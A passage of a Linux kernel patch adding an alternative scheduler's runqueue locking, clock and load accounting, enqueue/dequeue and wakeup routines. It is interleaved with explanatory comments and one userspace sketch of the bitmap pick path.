++
++	if (prio == last_prio)
++		return;
++
++	rq->prio = prio;
++	cpu = cpu_of(rq);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
++		return;
++	}
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
++
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
++#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
++}
++
++/*
++ * This routine assume that the idle task always in queue
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
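That "idle task always in the queue" invariant is what keeps this pick path branch-free: the idle task permanently occupies the lowest-priority slot, so the bitmap scan always finds a set bit. A minimal userspace sketch of the idea, with __builtin_ctzll() (GCC/Clang) standing in for find_first_bit():

#include <stdio.h>

#define NR_PRIOS  64
#define IDLE_PRIO (NR_PRIOS - 1)

static unsigned long long bitmap;	/* bit i set => queue i non-empty */

static void enqueue(int prio) { bitmap |= 1ULL << prio; }
static void dequeue(int prio) { bitmap &= ~(1ULL << prio); }

/* Never called on an empty bitmap: the idle bit is always set. */
static int pick_first(void)
{
	return __builtin_ctzll(bitmap);
}

int main(void)
{
	enqueue(IDLE_PRIO);		/* idle parked at the lowest prio */
	printf("%d\n", pick_first());	/* 63: only idle is runnable      */
	enqueue(20);
	printf("%d\n", pick_first());	/* 20: a normal task wins         */
	dequeue(20);
	printf("%d\n", pick_first());	/* 63 again                       */
	return 0;
}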
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock, it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
++
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compiler should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight misattribution of {soft,}irq
++	 * time; a more accurate solution would be to update the irq_time
++	 * using the current rq->clock timestamp, except that would require
++	 * using atomic ops.
++	 */
++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
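++
++/*
++ * Worked example (illustrative): each history bit covers a 2^17ns
++ * (~131us) block, with the newest block at bit 31 (CURRENT_LOAD_BIT).
++ * RQ_LOAD_HISTORY_TO_UTIL() extracts the eight completed blocks below
++ * it, i.e. (l >> 23) & 0xff. For a runqueue busy through all eight of
++ * those blocks, load_history = 0xff800000 gives 0xff, so with
++ * max = 1024:
++ *
++ *	rq_load_util(rq, 1024) = 0xff * (1024 >> 8) = 255 * 4 = 1020
++ *
++ * which is close to full capacity; an idle history yields 0.
++ */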
++
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time.
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * The tick may be needed by tasks in the runqueue depending on their policy
++ * and requirements. If the tick is needed, let's send the target an IPI to
++ * kick it out of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++	sched_info_dequeue(rq, p);						\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags);						\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_preempt_mask(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_preempt_mask(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
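++
++/*
++ * Illustrative userspace analogue (a sketch, not kernel code): the
++ * same pattern with C11 <stdatomic.h>, where the compare-exchange
++ * reloads _val on failure just as try_cmpxchg() does above, so the
++ * pre-OR value ends up being returned:
++ *
++ *	#include <stdatomic.h>
++ *
++ *	static unsigned int fetch_or_u(_Atomic unsigned int *p,
++ *				       unsigned int mask)
++ *	{
++ *		unsigned int val = atomic_load(p);
++ *
++ *		do {
++ *		} while (!atomic_compare_exchange_weak(p, &val, val | mask));
++ *		return val;
++ *	}
++ *
++ * C11 also provides atomic_fetch_or() doing exactly this in one call;
++ * the kernel macro exists so it works for different integer types.
++ */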
++
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task; if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, so there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold a reference to @task can call the 'safe' version and
++ * trust wake_q to do the right thing depending on whether or not the @task
++ * is already queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
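++
++/*
++ * Usage sketch (illustrative; 'obj' and 'waiter' are placeholders):
++ * queue wakeups while holding a lock and issue them after dropping
++ * it, so wake_up_process() never runs under the lock:
++ *
++ *	DEFINE_WAKE_Q(wake_q);
++ *
++ *	spin_lock(&obj->lock);
++ *	wake_q_add(&wake_q, waiter);
++ *	spin_unlock(&obj->lock);
++ *	wake_up_q(&wake_q);
++ *
++ * Futexes and rt-mutexes use this pattern.
++ */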
++
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means setting the need_resched flag; on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do a similar optimization for a completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
++ * (as that CPU's timer base may not be up to date wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
++	return cpu;
++}
++
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
